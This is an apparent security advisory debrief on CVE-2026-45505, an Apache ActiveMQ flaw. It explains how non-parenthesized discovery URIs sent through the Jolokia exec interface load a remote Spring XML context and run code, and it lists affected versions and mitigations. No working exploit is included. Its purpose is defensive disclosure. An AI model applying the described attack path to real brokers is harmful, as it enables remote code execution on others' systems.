PatchSiren cyber security CVE debrief

CVE-2026-45505 Apache Software Foundation CVE debrief

Apache ActiveMQ Broker, ActiveMQ All, and ActiveMQ are affected by an improper input validation and code injection vulnerability. Non-parenthesized discovery wrappers—specifically `masterslave:vm://...,...` and `static:vm://...`—incorrectly pass validation, bypassing the fix for CVE-2026-34197. An authenticated attacker with access to the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console can invoke exec operations on ActiveMQ MBeans, including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String). A crafted discovery URI triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context via ResourceXmlApplicationContext. Because Spring instantiates singleton beans before BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). Affected versions are before 5.19.7 and from 6.0.0 before 6.2.6 for all three product variants. The fix is present in 5.19.7 and 6.2.6.

Vendor: Apache Software Foundation
Product: Apache ActiveMQ Broker
CVSS: HIGH 8.8
CISA KEV: Not listed in stored evidence
Original CVE published: 2026-06-01
Original CVE updated: 2026-06-01
Advisory published: 2026-06-01
Advisory updated: 2026-06-01

Who should care

Organizations running Apache ActiveMQ Broker, ActiveMQ All, or ActiveMQ versions prior to 5.19.7 or in the 6.x range prior to 6.2.6, especially those exposing the web console or Jolokia /api/jolokia/ endpoint to networks reachable by potential attackers. Security teams should prioritize patching due to the authenticated but high-impact remote code execution vector.

Technical summary

The vulnerability exists in the validation logic for ActiveMQ discovery URIs. The original fix for CVE-2026-34197 did not account for non-parenthesized wrapper syntax such as `masterslave:vm://...,...` and `static:vm://...`. When such a URI is supplied through the Jolokia exec interface to BrokerService.addNetworkConnector or addConnector, the VM transport parses the brokerConfig parameter and loads a remote Spring XML context using ResourceXmlApplicationContext. Spring's eager singleton instantiation executes bean factory methods—including Runtime.exec()—before ActiveMQ's BrokerService performs its own configuration validation, resulting in arbitrary code execution on the broker JVM. The attack requires authenticated access to the Jolokia endpoint.

Defensive priority

critical

Recommended defensive actions

Upgrade Apache ActiveMQ Broker, ActiveMQ All, or ActiveMQ to version 5.19.7 or 6.2.6 or later.
If immediate patching is not feasible, restrict network access to the ActiveMQ web console and the /api/jolokia/ endpoint to trusted administrative hosts only.
Review authentication controls on the Jolokia JMX-HTTP bridge; ensure strong credentials and, where possible, limit Jolokia access policies to disallow exec operations on sensitive MBeans.
Monitor for unexpected network connector or broker configuration changes, and audit logs for exec invocations on org.apache.activemq:* MBeans.
Assess whether any prior exploitation of CVE-2026-34197 occurred in the environment, as this CVE represents a bypass of that earlier fix.

Evidence notes

Vulnerability description and affected versions drawn from official CVE text. The bypass mechanism (non-parenthesized discovery wrappers) and the underlying attack path via Jolokia exec operations and ResourceXmlApplicationContext are explicitly documented in the CVE description. Fix versions 5.19.7 and 6.2.6 are stated in the official advisory. Timeline dates use the CVE published/modified timestamp of 2026-06-01T09:16:19.700Z.

Official resources

2026-06-01